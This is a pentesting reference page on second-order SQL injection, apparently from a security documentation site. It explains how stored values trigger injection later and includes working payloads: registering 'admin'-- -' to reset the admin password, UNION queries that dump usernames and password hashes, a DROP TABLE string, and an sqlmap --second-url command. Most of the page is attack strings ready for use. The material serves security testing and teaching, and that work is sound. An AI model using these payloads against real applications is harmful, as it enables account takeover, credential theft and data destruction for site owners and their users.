> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Second-Order

> Second-order SQL injection: stored payloads that trigger when used in a different query context.

## Overview

Payload is stored in the database (registration, profile update) and executed later when another feature reads and uses it in a SQL query without sanitization. Input is sanitized on insert but not on retrieval.

***

## How It Works

```
1. Attacker registers username: admin'-- -
2. Application stores it safely (parameterized INSERT)
3. Later, application uses stored username in another query:
   SELECT * FROM users WHERE username='admin'-- -'
4. Injection triggers on the second query
```

***

## Common Injection Points

| Store Here | Triggers Here                             |
| ---------- | ----------------------------------------- |
| Username   | Profile page, password reset, admin panel |
| Email      | Notification system, search, export       |
| Address    | Order processing, invoice generation      |
| Comment    | Admin review panel, moderation page       |
| Filename   | File listing, download feature            |

***

## Example — Password Reset

### Register

```
Username: admin'-- -
Password: anything
```

### Trigger — Change Password

Application runs:

```sql theme={"dark"}
UPDATE users SET password='newpass' WHERE username='admin'-- -'
```

Result: admin password changed to `newpass`.

***

## Example — Profile Update

### Register

```
Username: ' UNION SELECT username,password FROM users-- -
```

### Trigger

Application displays profile with:

```sql theme={"dark"}
SELECT bio FROM profiles WHERE username='' UNION SELECT username,password FROM users-- -'
```

***

## Example — Data Exfiltration

### Store

```
Name: ' OR 1=1 UNION SELECT group_concat(username,0x3a,password) FROM users-- -
```

### Trigger

Appears on admin dashboard, export CSV, or email notification that renders the stored value in a query.

***

## Testing Methodology

1. Identify all input fields that store data
2. Inject payloads in each field (registration, profile, settings)
3. Navigate to every feature that reads those fields
4. Monitor for SQL errors or unexpected data
5. Check admin panels, reports, search, export features

### Useful Payloads

```
admin'-- -
admin' AND 1=1-- -
admin' UNION SELECT NULL-- -
' OR '1'='1
test'); DROP TABLE temp;-- -
```

***

## SQLmap Second-Order

```bash theme={"dark"}
sqlmap -r request.txt --second-url="http://TARGET/profile" --batch
```

`--second-url` = page where stored payload is triggered.

***

## Quick Reference

| Step           | Action                                           |
| -------------- | ------------------------------------------------ |
| Store          | Inject payload via registration/profile/settings |
| Trigger        | Visit page that queries stored data              |
| Password reset | Register as `admin'-- -`, change password        |
| SQLmap         | `--second-url="http://TARGET/trigger-page"`      |

***

## Sources

* [PortSwigger — Second-Order SQL Injection](https://portswigger.net/kb/issues/00100210_sql-injection-second-order)
* [OWASP — SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
* [SQLmap Wiki — Second-Order](https://github.com/sqlmapproject/sqlmap/wiki/Usage#second-order-sql-injection)
